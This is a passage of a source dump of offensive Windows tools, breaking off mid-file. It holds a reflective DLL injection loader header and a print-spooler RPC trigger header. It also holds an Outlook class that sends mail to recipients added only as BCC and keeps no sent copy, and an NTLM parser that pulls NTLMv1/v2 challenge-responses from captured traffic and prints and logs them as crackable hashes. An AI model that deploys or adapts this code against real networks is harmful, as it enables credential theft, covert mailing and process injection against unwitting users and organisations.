261 | FakesAssemblies/
262 |
263 | # GhostDoc plugin setting file
264 | *.GhostDoc.xml
265 |
266 | # Node.js Tools for Visual Studio
267 | .ntvs_analysis.dat
268 | node_modules/
269 |
270 | # Visual Studio 6 build log
271 | *.plg
272 |
273 | # Visual Studio 6 workspace options file
274 | *.opt
275 |
276 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
277 | *.vbw
278 |
279 | # Visual Studio LightSwitch build output
280 | **/*.HTMLClient/GeneratedArtifacts
281 | **/*.DesktopClient/GeneratedArtifacts
282 | **/*.DesktopClient/ModelManifest.xml
283 | **/*.Server/GeneratedArtifacts
284 | **/*.Server/ModelManifest.xml
285 | _Pvt_Extensions
286 |
287 | # Paket dependency manager
288 | .paket/paket.exe
289 | paket-files/
290 |
291 | # FAKE - F# Make
292 | .fake/
293 |
294 | # JetBrains Rider
295 | .idea/
296 | *.sln.iml
297 |
298 | # CodeRush personal settings
299 | .cr/personal
300 |
301 | # Python Tools for Visual Studio (PTVS)
302 | __pycache__/
303 | *.pyc
304 |
305 | # Cake - Uncomment if you are using it
306 | # tools/**
307 | # !tools/packages.config
308 |
309 | # Tabs Studio
310 | *.tss
311 |
312 | # Telerik's JustMock configuration file
313 | *.jmconfig
314 |
315 | # BizTalk build output
316 | *.btp.cs
317 | *.btm.cs
318 | *.odx.cs
319 | *.xsd.cs
320 |
321 | # OpenCover UI analysis results
322 | OpenCover/
323 |
324 | # Azure Stream Analytics local run output
325 | ASALocalRun/
326 |
327 | # MSBuild Binary and Structured Log
328 | *.binlog
329 |
330 | # NVidia Nsight GPU debugger configuration file
331 | *.nvuser
332 |
333 | # MFractors (Xamarin productivity tool) working folder
334 | .mfractor/
335 |
336 | # Local History for Visual Studio
337 | .localhistory/
338 |
339 | # BeatPulse healthcheck temp database
340 | healthchecksdb
341 |
342 | .DS_Store
343 |
--------------------------------------------------------------------------------
/Tools/spoolsystem/SpoolTrigger/ReflectiveLoader.h:
--------------------------------------------------------------------------------
1 | //===============================================================================================//
2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
3 | // All rights reserved.
4 | //
5 | // Redistribution and use in source and binary forms, with or without modification, are permitted
6 | // provided that the following conditions are met:
7 | //
8 | // * Redistributions of source code must retain the above copyright notice, this list of
9 | // conditions and the following disclaimer.
10 | //
11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of
12 | // conditions and the following disclaimer in the documentation and/or other materials provided
13 | // with the distribution.
14 | //
15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to
16 | // endorse or promote products derived from this software without specific prior written permission.
17 | //
18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
26 | // POSSIBILITY OF SUCH DAMAGE.
27 | //===============================================================================================//
28 | #ifndef _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H
29 | #define _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H
30 | //===============================================================================================//
31 | #define WIN32_LEAN_AND_MEAN
32 | #include
33 | #include
34 |
35 | #include "ReflectiveDLLInjection.h"
36 |
// Function-pointer types whose signatures match the Win32/NT routines they are named after.
// Nothing in this header assigns them; presumably the including source file fills them with
// addresses it resolves by itself rather than through the import table - confirm there.
typedef HMODULE(WINAPI* LOADLIBRARYA)(LPCSTR);
typedef FARPROC(WINAPI* GETPROCADDRESS)(HMODULE, LPCSTR);
typedef LPVOID(WINAPI* VIRTUALALLOC)(LPVOID, SIZE_T, DWORD, DWORD);
typedef DWORD(NTAPI* NTFLUSHINSTRUCTIONCACHE)(HANDLE, PVOID, ULONG);

// Precomputed 32-bit constants named after two modules...
// NOTE(review): presumably produced with the rotate-by-HASH_KEY scheme that hash() implements
// below; the code that compares against them is not part of this header.
// NOTE(review): the values are fixed and published with the original project, so they tend to
// survive unchanged in derived builds and are commonly usable as static indicators when
// triaging a binary.
#define KERNEL32DLL_HASH 0x6A4ABC5B
#define NTDLLDLL_HASH 0x3CFA685D

// ...and after the four routines typed above.
#define LOADLIBRARYA_HASH 0xEC0E4E8E
#define GETPROCADDRESS_HASH 0x7C0DFCAA
#define VIRTUALALLOC_HASH 0x91AFCA54
#define NTFLUSHINSTRUCTIONCACHE_HASH 0x534C0AB8

// Relocation type numbers for ARM images; not referenced anywhere else in this header.
#define IMAGE_REL_BASED_ARM_MOV32A 5
#define IMAGE_REL_BASED_ARM_MOV32T 7

// Bit masks and opcode patterns, presumably for recognising/patching Thumb-2 MOVW/MOVT
// instruction pairs during ARM relocation - confirm against the relocation code.
#define ARM_MOV_MASK (DWORD)(0xFBF08000)
#define ARM_MOV_MASK2 (DWORD)(0xFBF08F00)
#define ARM_MOVW 0xF2400000
#define ARM_MOVT 0xF2C00000

// Rotate count consumed by ror(); changing it invalidates every *_HASH constant above.
#define HASH_KEY 13
59 | //===============================================================================================//
60 | #pragma intrinsic( _rotr )
61 |
// Rotate a 32-bit value right by HASH_KEY bit positions via the _rotr intrinsic.
__forceinline DWORD ror(DWORD d)
{
    const DWORD rotated = _rotr(d, HASH_KEY);
    return rotated;
}
66 |
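// Rotate-and-add hash of a NUL-terminated byte string.
//
// For every byte before the terminator the running value is rotated right by HASH_KEY bits
// (see ror()) and the byte is then added. The result is fully determined by the input and
// HASH_KEY, so the same name always yields the same constant.
//
// c       pointer to a NUL-terminated string; must not be NULL.
// returns the 32-bit hash; an empty string hashes to 0.
//
// Changes from the previous version:
//  * The do/while form processed the first byte unconditionally and then tested c[1]. For an
//    empty string that read one byte past the terminator. A pre-tested loop gives identical
//    results for every non-empty string and stops cleanly on an empty one.
//  * `register` is dropped: it has no effect on current compilers and is rejected outright
//    in C++17 mode when this header is pulled into a .cpp translation unit.
__forceinline DWORD hash(char* c)
{
    DWORD h = 0;

    while (*c)
    {
        h = ror(h);
        // *c is a plain char: where char is signed, bytes >= 0x80 are sign-extended before
        // the add, exactly as before. Kept as-is so existing constants stay valid.
        h += *c;
        ++c;
    }

    return h;
}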
78 | //===============================================================================================//
// Counted wide-string descriptor: two USHORT length fields followed by a buffer pointer.
// NOTE(review): presumably a locally named copy of the Windows UNICODE_STRING layout - confirm.
typedef struct _UNICODE_STR
{
    USHORT Length;        // presumably a byte count, not a character count - confirm against UNICODE_STRING
    USHORT MaximumLength;
    PWSTR pBuffer;        // if UNICODE_STRING semantics apply, not guaranteed NUL-terminated: bound reads by Length
} UNICODE_STR, * PUNICODE_STR;
85 |
// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY
//__declspec( align(8) )
// Hand-maintained view of one loader module record. The first member of the real structure
// (InLoadOrderLinks) is intentionally commented out: a pointer taken from the
// InMemoryOrderModuleList chain can then be treated as a pointer to this struct, and every
// field below is laid out relative to that list link rather than to the true start of the record.
// NOTE(review): the layout appears to be copied from the debugger dump named above, not from a
// public header - re-check it against the Windows builds this is expected to run on.
typedef struct _LDR_DATA_TABLE_ENTRY
{
    //LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry.
    LIST_ENTRY InMemoryOrderModuleList;
    LIST_ENTRY InInitializationOrderModuleList;
    PVOID DllBase;
    PVOID EntryPoint;
    ULONG SizeOfImage;
    UNICODE_STR FullDllName;
    UNICODE_STR BaseDllName; // counted string (see UNICODE_STR); do not assume a terminator
    ULONG Flags;
    SHORT LoadCount;
    SHORT TlsIndex;
    LIST_ENTRY HashTableEntry;
    ULONG TimeDateStamp;
} LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY;
104 |
// WinDbg> dt -v ntdll!_PEB_LDR_DATA
// Loader bookkeeping block holding the heads of three module lists.
// The "0x28 bytes" figure below only adds up when pointers are 4 bytes wide, i.e. it describes
// the 32-bit layout; the field order is what matters for other pointer sizes.
typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
{
    DWORD dwLength;
    DWORD dwInitialized;
    LPVOID lpSsHandle;
    LIST_ENTRY InLoadOrderModuleList;
    LIST_ENTRY InMemoryOrderModuleList; // the list LDR_DATA_TABLE_ENTRY in this header is laid out for
    LIST_ENTRY InInitializationOrderModuleList;
    LPVOID lpEntryInProgress;
} PEB_LDR_DATA, * PPEB_LDR_DATA;
116 |
// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK
// Singly linked node: a next pointer plus a size. Only referenced in this header as the type of
// the PEB's pFreeList member. The "0x8 bytes" figure assumes 4-byte pointers.
typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes
{
    struct _PEB_FREE_BLOCK* pNext;
    DWORD dwSize;
} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK;
123 |
// struct _PEB is defined in Winternl.h but it is incomplete
// WinDbg> dt -v ntdll!_PEB
// Full hand-written Process Environment Block layout, declared under the struct tag __PEB and
// the typedef names _PEB / _PPEB.
// NOTE(review): the element count and byte size quoted below come from the debugger dump named
// above; with this many pointer-sized members they cannot hold for both 32- and 64-bit builds,
// so they presumably describe the 32-bit layout - confirm before relying on offsets.
// NOTE(review): the typedef name _PEB is the same identifier Winternl.h uses as a struct tag;
// in a C++ translation unit that also includes Winternl.h this is likely to collide.
// NOTE(review): later members have been rearranged across Windows releases; treat anything
// past pLdr as version-specific unless verified.
typedef struct __PEB // 65 elements, 0x210 bytes
{
    BYTE bInheritedAddressSpace;
    BYTE bReadImageFileExecOptions;
    BYTE bBeingDebugged;
    BYTE bSpareBool;
    LPVOID lpMutant;
    LPVOID lpImageBaseAddress;
    PPEB_LDR_DATA pLdr; // loader data; typed with the PEB_LDR_DATA declared earlier in this header
    LPVOID lpProcessParameters;
    LPVOID lpSubSystemData;
    LPVOID lpProcessHeap;
    PRTL_CRITICAL_SECTION pFastPebLock;
    LPVOID lpFastPebLockRoutine;
    LPVOID lpFastPebUnlockRoutine;
    DWORD dwEnvironmentUpdateCount;
    LPVOID lpKernelCallbackTable;
    DWORD dwSystemReserved;
    DWORD dwAtlThunkSListPtr32;
    PPEB_FREE_BLOCK pFreeList;
    DWORD dwTlsExpansionCounter;
    LPVOID lpTlsBitmap;
    DWORD dwTlsBitmapBits[2];
    LPVOID lpReadOnlySharedMemoryBase;
    LPVOID lpReadOnlySharedMemoryHeap;
    LPVOID lpReadOnlyStaticServerData;
    LPVOID lpAnsiCodePageData;
    LPVOID lpOemCodePageData;
    LPVOID lpUnicodeCaseTableData;
    DWORD dwNumberOfProcessors;
    DWORD dwNtGlobalFlag;
    LARGE_INTEGER liCriticalSectionTimeout;
    DWORD dwHeapSegmentReserve;
    DWORD dwHeapSegmentCommit;
    DWORD dwHeapDeCommitTotalFreeThreshold;
    DWORD dwHeapDeCommitFreeBlockThreshold;
    DWORD dwNumberOfHeaps;
    DWORD dwMaximumNumberOfHeaps;
    LPVOID lpProcessHeaps;
    LPVOID lpGdiSharedHandleTable;
    LPVOID lpProcessStarterHelper;
    DWORD dwGdiDCAttributeList;
    LPVOID lpLoaderLock;
    DWORD dwOSMajorVersion;
    DWORD dwOSMinorVersion;
    WORD wOSBuildNumber;
    WORD wOSCSDVersion;
    DWORD dwOSPlatformId;
    DWORD dwImageSubsystem;
    DWORD dwImageSubsystemMajorVersion;
    DWORD dwImageSubsystemMinorVersion;
    DWORD dwImageProcessAffinityMask;
    DWORD dwGdiHandleBuffer[34];
    LPVOID lpPostProcessInitRoutine;
    LPVOID lpTlsExpansionBitmap;
    DWORD dwTlsExpansionBitmapBits[32];
    DWORD dwSessionId;
    ULARGE_INTEGER liAppCompatFlags;
    ULARGE_INTEGER liAppCompatFlagsUser;
    LPVOID lppShimData;
    LPVOID lpAppCompatInfo;
    UNICODE_STR usCSDVersion;
    LPVOID lpActivationContextData;
    LPVOID lpProcessAssemblyStorageMap;
    LPVOID lpSystemDefaultActivationContextData;
    LPVOID lpSystemAssemblyStorageMap;
    DWORD dwMinimumStackCommit;
} _PEB, * _PPEB;
194 |
// Two bit-fields sharing one WORD: a 12-bit offset and a 4-bit type.
// Presumably one entry of a PE base-relocation block (compare the IMAGE_REL_BASED_* values
// defined earlier in this header) - confirm against the code that walks relocations.
// NOTE(review): bit-field placement is implementation-defined; this layout relies on the
// compiler putting `offset` in the low-order bits. Verify before building with another toolchain.
typedef struct
{
    WORD offset : 12;
    WORD type : 4;
} IMAGE_RELOC, * PIMAGE_RELOC;
200 | //===============================================================================================//
201 | #endif
202 | //===============================================================================================//
203 |
--------------------------------------------------------------------------------
/Tools/Sigwhatever/clsOutlook.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Diagnostics;
3 | using System.Linq;
4 | using System.Runtime.InteropServices;
5 | using Microsoft.Office.Interop.Outlook;
6 | using Microsoft.Office.Interop.Word;
7 | using System.Collections.Generic;
8 | using Outlook = Microsoft.Office.Interop.Outlook;
9 |
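namespace Sigwhatever
{
    // Wrapper around the Outlook COM object model. It attaches to a running Outlook (or starts
    // one), submits an HTML message with every recipient added as BCC, and reads the signature
    // Outlook auto-inserts into a new draft.
    //
    // Lifetime: SendEmail() releases the application and namespace references when it returns,
    // so the instance must not be used again after that call.
    //
    // Review notes on what this code leaves behind in a mailbox:
    //  * DeleteAfterSubmit is set on every message, so no copy is kept in Sent Items; server-side
    //    message tracking is where such mail remains visible.
    //  * Recipients are added as BCC only, so the delivered message shows no To/Cc line.
    class ClsOutlook
    {
        private Outlook.Application outlookApp;
        private Outlook.NameSpace nameSpace;

        // Binds to Outlook and opens the MAPI namespace. Throws if Outlook cannot be reached.
        public ClsOutlook()
        {
            outlookApp = GetApplicationObject();
            nameSpace = outlookApp.GetNamespace("MAPI");
        }

        // Sends one message and then releases the Outlook references held by this instance.
        //
        // "Sent Email" is now printed only when the submit really succeeded. Previously this
        // method called SendEmailThroughOutlook(), which swallows every exception, so the success
        // line was printed after a failure as well and the catch below could never run.
        public void SendEmail(List<string> to, string subject, string body)
        {
            try
            {
                SubmitMessage(to, subject, body);
                Console.WriteLine("\r\nSent Email");
            }
            catch (System.Exception e)
            {
                Console.WriteLine("Error sending message: " + e.Message);
            }
            ReleaseComObject(outlookApp);
            ReleaseComObject(nameSpace);
        }

        // Non-throwing variant kept for existing callers: failures are reported on the console only.
        public void SendEmailThroughOutlook(List<string> toList, string subject, string body)
        {
            try
            {
                SubmitMessage(toList, subject, body);
            }
            catch (System.Exception ex)
            {
                Console.WriteLine("Failed to send email: " + ex.Message);
            }
        }

        // Builds and submits the message; any COM or argument failure propagates to the caller.
        private void SubmitMessage(List<string> toList, string subject, string body)
        {
            Outlook.MailItem oMsg = null;
            Outlook.Recipients oRecips = null;

            try
            {
                oMsg = (Outlook.MailItem)outlookApp.CreateItem(Outlook.OlItemType.olMailItem);
                Console.WriteLine("Made outlook mailitem object");

                oMsg.Subject = subject;
                // No copy of the message is saved once it has been sent.
                oMsg.DeleteAfterSubmit = true;
                oMsg.HTMLBody = body;

                Console.WriteLine("Adding recipients from list - there are " + toList.Count);
                oRecips = (Outlook.Recipients)oMsg.Recipients;
                Console.WriteLine("======");

                foreach (string emailaddress in toList)
                {
                    Console.WriteLine(emailaddress);
                    // Entries of two characters or fewer are echoed but not added.
                    if (emailaddress.Length > 2)
                    {
                        Console.WriteLine("Adding " + emailaddress + " as BCC");
                        Outlook.Recipient oRecip = (Outlook.Recipient)oRecips.Add(emailaddress);
                        try
                        {
                            oRecip.Type = (int)OlMailRecipientType.olBCC;
                            // The result of Resolve() is not checked, matching earlier behaviour.
                            oRecip.Resolve();
                        }
                        finally
                        {
                            // Assigning null does not free a COM wrapper; release it explicitly.
                            ReleaseComObject(oRecip);
                        }
                    }
                }
                Console.WriteLine("Done adding recipients, added {0} ", oRecips.Count);

                oMsg.Send();
            }
            finally
            {
                ReleaseComObject(oRecips);
                ReleaseComObject(oMsg);
            }
        }

        // Returns the text Outlook auto-inserts as the signature in a new message.
        //
        // Returns null when the draft, its inspector or its Word editor cannot be obtained, and
        // "" when there is no signature bookmark or its text is null. The temporary draft is
        // always discarded, including on the failure path, which previously left it open.
        public string GetExistingSig()
        {
            string signature = "";

            Microsoft.Office.Interop.Word.Bookmarks bkms = null;
            Microsoft.Office.Interop.Word.Document document = null;
            Outlook.Inspector inspector = null;
            Outlook.MailItem oMsg = null;

            try
            {
                try
                {
                    oMsg = (Outlook.MailItem)outlookApp.CreateItem(Outlook.OlItemType.olMailItem);
                    inspector = oMsg.GetInspector;
                    document = (Microsoft.Office.Interop.Word.Document)inspector.WordEditor;
                    bkms = document.Bookmarks;
                    // The signature bookmark is a hidden one.
                    bkms.ShowHidden = true;
                }
                catch (System.Exception)
                {
                    Console.WriteLine("[!] Couldn't get Outlook COM object");
                    return null;
                }

                try
                {
                    signature = ReadAutoSignature(bkms);
                }
                catch (System.Exception ee)
                {
                    Console.WriteLine("Couldn't get existing signature from email body: " + ee.Message);
                }

                return signature;
            }
            finally
            {
                DiscardDraft(oMsg, document, inspector);
                ReleaseComObject(bkms);
                ReleaseComObject(document);
                ReleaseComObject(inspector);
                ReleaseComObject(oMsg);
            }
        }

        // Reads the text of the "_MailAutoSig" bookmark, or "" when it is absent or has no text.
        private static string ReadAutoSignature(Microsoft.Office.Interop.Word.Bookmarks bkms)
        {
            Microsoft.Office.Interop.Word.Bookmark bkm = null;
            try
            {
                bkm = bkms["_MailAutoSig"];
            }
            catch (System.Exception)
            {
                // The indexer throws when the bookmark does not exist; treated as "no signature".
            }

            if (bkm == null)
            {
                Console.WriteLine("No Signature");
                return "";
            }

            Microsoft.Office.Interop.Word.Range bkmRange = null;
            try
            {
                bkmRange = bkm.Range;
                string bkmText = bkmRange.Text;

                if (string.IsNullOrWhiteSpace(bkmText))
                {
                    Console.WriteLine("Signature Empty");
                }
                else
                {
                    Console.WriteLine("Existing Signature is: " + bkmText);
                }

                // The earlier code called ToString() on the text after an unbraced if/else, so a
                // null text raised a NullReferenceException and skipped the releases below.
                return bkmText ?? "";
            }
            finally
            {
                ReleaseComObject(bkmRange);
                ReleaseComObject(bkm);
            }
        }

        // Closes the temporary draft without saving; reports, but does not rethrow, a failure.
        private static void DiscardDraft(Outlook.MailItem oMsg,
                                         Microsoft.Office.Interop.Word.Document document,
                                         Outlook.Inspector inspector)
        {
            try
            {
                if (oMsg != null)
                {
                    oMsg.Close(OlInspectorClose.olDiscard);
                }
                if (document != null)
                {
                    document.Close(WdSaveOptions.wdDoNotSaveChanges);
                }
                if (inspector != null)
                {
                    inspector.Close(OlInspectorClose.olDiscard);
                }
            }
            catch (System.Exception)
            {
                Console.WriteLine("Couldn't close Outlook inspector.");
            }
        }

        // Releases one COM wrapper reference; a null argument is ignored.
        // The former "obj = null" only cleared the local parameter copy and has been dropped.
        public static void ReleaseComObject(object obj)
        {
            if (obj != null)
            {
                Marshal.ReleaseComObject(obj);
            }
        }

        // Returns the Outlook Application object: the running instance when a process named
        // OUTLOOK exists, otherwise a new instance after a MAPI Logon with empty profile and
        // password and both boolean arguments false.
        // The `as` cast can yield null; the constructor then fails on its first member access.
        private static Outlook.Application GetApplicationObject()
        {
            if (Process.GetProcessesByName("OUTLOOK").Length > 0)
            {
                return Marshal.GetActiveObject("Outlook.Application") as Outlook.Application;
            }

            Console.WriteLine("[!] Outlook not running, you're going to need to provide creds");
            Outlook.Application application = new Outlook.Application();
            Outlook.NameSpace session = application.GetNamespace("MAPI");
            session.Logon("", "", false, false);
            return application;
        }
    }
}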
206 |
--------------------------------------------------------------------------------
/Tools/Sigwhatever/NTLM.cs:
--------------------------------------------------------------------------------
1 | using Microsoft.Office.Interop.Word;
2 | using System;
3 | using System.Collections.Generic;
4 | using System.IO;
5 |
6 | namespace Sigwhatever
7 | {
/// <summary>
/// Locates an NTLMSSP type 3 (AUTHENTICATE) message inside a captured payload,
/// extracts its fields and reports the NTLMv1 or NTLMv2 challenge-response.
/// </summary>
class NTLM
{
    // Hex form of the ASCII signature "NTLMSSP\0" that starts an NTLMSSP message.
    private const string NtlmsspSignatureHex = "4E544C4D53535000";

    // Hex form of the little-endian message type 3, found 8 bytes after the signature.
    private const string AuthenticateTypeHex = "03000000";

    // "domain + user" keys that the NTLMv2 branch has already reported.
    public static List<string> lstCaptured = new List<string>();

    /// <summary>
    /// Parses <paramref name="field"/> for a type 3 NTLMSSP message and, when the
    /// enabled-protocol, machine-account and challenge checks pass, prints the
    /// challenge-response line and appends an encrypted copy to the log file.
    /// </summary>
    /// <param name="field">Raw bytes that may contain the NTLMSSP message.</param>
    /// <param name="sourceIP">Client address; with <paramref name="sourcePort"/> it forms the session key.</param>
    /// <param name="sourcePort">Client port as text.</param>
    /// <param name="protocol">Protocol label; "HTTP", "Proxy" and "SMB" are treated specially.</param>
    /// <param name="protocolPort">Listener port, used only in the console message.</param>
    /// <param name="Logfile">Path of the log file, or null for no file output.</param>
    /// <remarks>
    /// The line is printed to the console in clear text; only the copy written
    /// to <paramref name="Logfile"/> goes through Crypto.Encrypt.
    /// Lengths and offsets are taken from the message itself; an out-of-range
    /// value surfaces as an exception from Buffer.BlockCopy or Substring, which
    /// this method does not catch.
    /// </remarks>
    public static void GetNTLMResponse(byte[] field, string sourceIP, string sourcePort, string protocol, string protocolPort, string Logfile)
    {
        Crypto Crypt1 = new Crypto();
        string payload = System.BitConverter.ToString(field).Replace("-", String.Empty);
        string session = sourceIP + ":" + sourcePort;
        int index = payload.IndexOf(NtlmsspSignatureHex);

        // HTTP and Proxy payloads are inspected regardless of where (or whether)
        // the signature was found; other protocols need it at a positive index.
        bool candidate = String.Equals(protocol, "HTTP") || String.Equals(protocol, "Proxy") || index > 0;
        if (!candidate || payload.Substring((index + 16), 8) != AuthenticateTypeHex)
        {
            return;
        }

        // index counts hex characters; two of them make one byte of field.
        int ntlmsspOffset = index / 2;
        int length;
        int offset;

        // Descriptors at 12/20/28/36/44: LM response, NT response, domain, user, host.
        byte[] lmBytes = CopyField(field, ntlmsspOffset, 12, out length, out offset);
        string lmResponse = System.BitConverter.ToString(lmBytes).Replace("-", String.Empty);

        int ntlmLength;
        byte[] ntBytes = CopyField(field, ntlmsspOffset, 20, out ntlmLength, out offset);
        string ntlmResponse = System.BitConverter.ToString(ntBytes).Replace("-", String.Empty);

        // The copies below are discarded; the BlockCopy inside CopyField still
        // throws when a descriptor points outside field, before the text decode.
        CopyField(field, ntlmsspOffset, 28, out length, out offset);
        string domain = Util.DataToString((ntlmsspOffset + offset), length, field);

        CopyField(field, ntlmsspOffset, 36, out length, out offset);
        string user = Util.DataToString((ntlmsspOffset + offset), length, field);

        CopyField(field, ntlmsspOffset, 44, out length, out offset);
        string host = Util.DataToString((ntlmsspOffset + offset), length, field);

        bool isSmb = String.Equals(protocol, "SMB");

        // For SMB no challenge is looked up here, so it stays empty.
        string challenge = "";
        if (!isSmb)
        {
            challenge = FindChallenge(session, sourceIP, sourcePort);
        }

        if (ntlmLength > 24)
        {
            // A colon is inserted after the first 32 hex characters (16 bytes) of the response.
            string ntlmV2Hash = user + "::" + domain + ":" + challenge + ":" + ntlmResponse.Insert(32, ":");

            lock (Program.outputList)
            {
                bool protocolEnabled = !isSmb || Program.enabledSMB;

                if (protocolEnabled && AccountWanted(user) && !String.IsNullOrEmpty(challenge))
                {
                    string captureKey = domain + user;

                    if (lstCaptured.Contains(captureKey))
                    {
                        Console.WriteLine("Already got a hash for " + user);
                    }
                    else
                    {
                        Console.WriteLine(String.Format("[+] [{0}] {1}({2}) NTLMv2 captured for {3}\\{4} from {5}({6}):{7}:{8}", DateTime.Now.ToString("s"), protocol, protocolPort, domain, user, sourceIP, host, sourcePort, ntlmV2Hash));
                        string printme = Crypt1.Encrypt(ntlmV2Hash, TCPHTTPCap.key);

                        // The path is not validated beyond being longer than one character.
                        if (Logfile != null && Logfile.Length > 1)
                        {
                            File.AppendAllText(Logfile, printme);
                            File.AppendAllText(Logfile, "\n\n");
                        }

                        lstCaptured.Add(captureKey);
                    }
                }
            }
        }
        else if (ntlmLength == 24)
        {
            string ntlmV1Hash = user + "::" + domain + ":" + lmResponse + ":" + ntlmResponse + ":" + challenge;

            lock (Program.outputList)
            {
                // This branch is gated on Program.enabledSMB for every protocol
                // and does not consult lstCaptured.
                if (Program.enabledSMB && AccountWanted(user) && !String.IsNullOrEmpty(challenge))
                {
                    Console.WriteLine(String.Format("[+] [{0}] {1}({2}) NTLMv1 captured for {3}\\{4} from {5}({6}):{7}:{8}", DateTime.Now.ToString("s"), protocol, protocolPort, domain, user, sourceIP, host, sourcePort, ntlmV1Hash));
                    string printme = Crypt1.Encrypt(ntlmV1Hash, TCPHTTPCap.key);

                    if (Logfile != null)
                    {
                        File.AppendAllText(Logfile, printme);
                        File.AppendAllText(Logfile, "\n\n");
                    }
                }
            }
        }
    }

    // Reads the 16-bit length at descriptor and the 32-bit offset at descriptor + 4
    // (both relative to the NTLMSSP start) and copies that many bytes out of field.
    private static byte[] CopyField(byte[] field, int ntlmsspOffset, int descriptor, out int length, out int offset)
    {
        length = (int)Util.UInt16DataLength((ntlmsspOffset + descriptor), field);
        offset = (int)Util.UInt32DataLength((ntlmsspOffset + descriptor + 4), field);
        byte[] copy = new byte[length];
        System.Buffer.BlockCopy(field, (ntlmsspOffset + offset), copy, 0, copy.Length);
        return copy;
    }

    // Looks up the stored challenge for the session; any failure yields "".
    private static string FindChallenge(string session, string sourceIP, string sourcePort)
    {
        try
        {
            return Program.httpSessionTable[session].ToString();
        }
        catch
        {
            try
            {
                // Fallback for a source port that changed between challenge and
                // response: retry with the port one below the current one.
                int newSourcePort = Int32.Parse(sourcePort) - 1;
                string newSession = sourceIP + ":" + newSourcePort;
                return Program.httpSessionTable[newSession].ToString();
            }
            catch
            {
                return "";
            }
        }
    }

    // Names ending in "$" are reported only when Program.enabledMachineAccounts is set.
    private static bool AccountWanted(string user)
    {
        return Program.enabledMachineAccounts || !user.EndsWith("$");
    }
}
183 |
184 | }
--------------------------------------------------------------------------------
/Tools/spoolsystem/SpoolTrigger/ms-rprn_h.h:
--------------------------------------------------------------------------------
1 |
2 |
3 | /* this ALWAYS GENERATED file contains the definitions for the interfaces */
4 |
5 |
6 | /* File created by MIDL compiler version 8.01.0622 */
7 | /* at Mon Jan 18 21:14:07 2038
8 | */
9 | /* Compiler settings for ms-rprn.idl:
10 | Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622
11 | protocol : all , ms_ext, c_ext, robust
12 | error checks: allocation ref bounds_check enum stub_data
13 | VC __declspec() decoration level:
14 | __declspec(uuid()), __declspec(selectany), __declspec(novtable)
15 | DECLSPEC_UUID(), MIDL_INTERFACE()
16 | */
17 | /* @@MIDL_FILE_HEADING( ) */
18 |
19 |
20 |
21 | /* verify that the version is high enough to compile this file*/
22 | #ifndef __REQUIRED_RPCNDR_H_VERSION__
23 | #define __REQUIRED_RPCNDR_H_VERSION__ 500
24 | #endif
25 |
26 | #include "rpc.h"
27 | #include "rpcndr.h"
28 |
29 | #ifndef __RPCNDR_H_VERSION__
30 | #error this stub requires an updated version of
31 | #endif /* __RPCNDR_H_VERSION__ */
32 |
33 |
34 | #ifndef __ms2Drprn_h_h__
35 | #define __ms2Drprn_h_h__
36 |
37 | #if defined(_MSC_VER) && (_MSC_VER >= 1020)
38 | #pragma once
39 | #endif
40 |
41 | /* Forward Declarations */
42 |
43 | /* header files for imported files */
44 | #include "oaidl.h"
45 |
46 | #ifdef __cplusplus
47 | extern "C"{
48 | #endif
49 |
50 |
51 | #ifndef __winspool_INTERFACE_DEFINED__
52 | #define __winspool_INTERFACE_DEFINED__
53 |
54 | /* interface winspool */
55 | /* [unique][endpoint][ms_union][version][uuid] */
56 |
/* Length-prefixed byte buffer; RpcOpenPrinter takes one as pDevModeContainer. */
typedef struct _DEVMODE_CONTAINER {
    DWORD cbBuf;
    BYTE *pDevMode;                      /* [unique][size_is] */
} DEVMODE_CONTAINER;

/* One entry of a notification option list: a type plus Count field ids. */
typedef struct _RPC_V2_NOTIFY_OPTIONS_TYPE {
    unsigned short Type;
    unsigned short Reserved0;
    DWORD Reserved1;
    DWORD Reserved2;
    DWORD Count;
    unsigned short *pFields;             /* [unique][size_is] */
} RPC_V2_NOTIFY_OPTIONS_TYPE;

/* Notification options: Count entries of RPC_V2_NOTIFY_OPTIONS_TYPE. */
typedef struct _RPC_V2_NOTIFY_OPTIONS {
    DWORD Version;
    DWORD Reserved;
    DWORD Count;
    RPC_V2_NOTIFY_OPTIONS_TYPE *pTypes;  /* [unique][size_is] */
} RPC_V2_NOTIFY_OPTIONS;

typedef unsigned short LANGID;

/* Context handles: opaque on the client side. */
typedef /* [context_handle] */ void *GDI_HANDLE;
typedef /* [context_handle] */ void *PRINTER_HANDLE;

/* Custom binding handle type; STRING_HANDLE_bind/unbind are declared further down. */
typedef /* [handle] */ wchar_t *STRING_HANDLE;
88 |
/*
 * Client prototypes for the winspool interface, in opnum order.
 *
